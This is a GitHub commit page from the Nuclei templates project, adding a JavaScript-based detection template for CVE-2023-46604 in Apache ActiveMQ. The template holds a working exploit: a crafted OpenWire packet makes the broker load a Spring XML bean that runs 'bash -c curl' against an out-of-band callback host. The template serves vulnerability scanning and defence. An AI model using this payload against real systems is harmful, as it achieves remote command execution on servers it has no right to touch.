Improved template for CVE-2023-46604 detection (#8807)

* Added JS based template for CVE-2023-46604 * removed less reliable template
projectdiscovery · Dec 12, 2023 · 2768ab1 · 2768ab1
1 parent 7cb786c
commit 2768ab1
Show file tree

Hide file tree

Showing 2 changed files with 64 additions and 52 deletions.
diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -0,0 +1,64 @@
+id: CVE-2023-46604
+
+info:
+  name: Apache ActiveMQ - Remote Code Execution
+  author: Ice3man,Mzack9999,pdresearch
+  severity: critical
+  description: |
+    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
+    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
+  reference:
+    - http://www.openwall.com/lists/oss-security/2023/10/27/5
+    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
+    - https://github.com/X1r0z/ActiveMQ-RCE
+    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
+    - https://paper.seebug.org/3058/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-46604
+    cwe-id: CWE-502
+    epss-score: 0.96805
+    epss-percentile: 0.99601
+    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: apache
+    product: activemq
+    shodan-query: product:"ActiveMQ OpenWire Transport"
+  tags: cve,cve2023,network,rce,apache,activemq,deserialization,kev
+
+variables:
+  prefix: "1f00000000000000000001010042"
+  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
+  final: "{{prefix}}{{classname}}"
+
+javascript:
+  - code: |
+      let m1 = require('nuclei/net');
+      let m2 = require('nuclei/bytes');
+      let b = m2.Buffer();
+      let name=Host+':'+Port;
+      let conn = m1.Open('tcp', name);
+      let oob='{{interactsh-url}}'
+      let randomvar = '{{randstr}}'
+      var Base64={encode: btoa}
+      exploit_xml='http://{{interactsh-url}}/b64_body:'+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
+      packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
+      packet+=(exploit_xml.length).toString(16)
+      packet+=(b.WriteString(exploit_xml)).Hex()
+      conn.SendHex(packet);
+      resp = conn.RecvString()
+      randomvar
+
+    args:
+      Host: "{{Host}}"
+      Port: "61616"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "dns")'
+          - 'contains(interactsh_request, response)'
+        condition: and
diff --git a/network/cves/2023/CVE-2023-46604.yaml b/network/cves/2023/CVE-2023-46604.yaml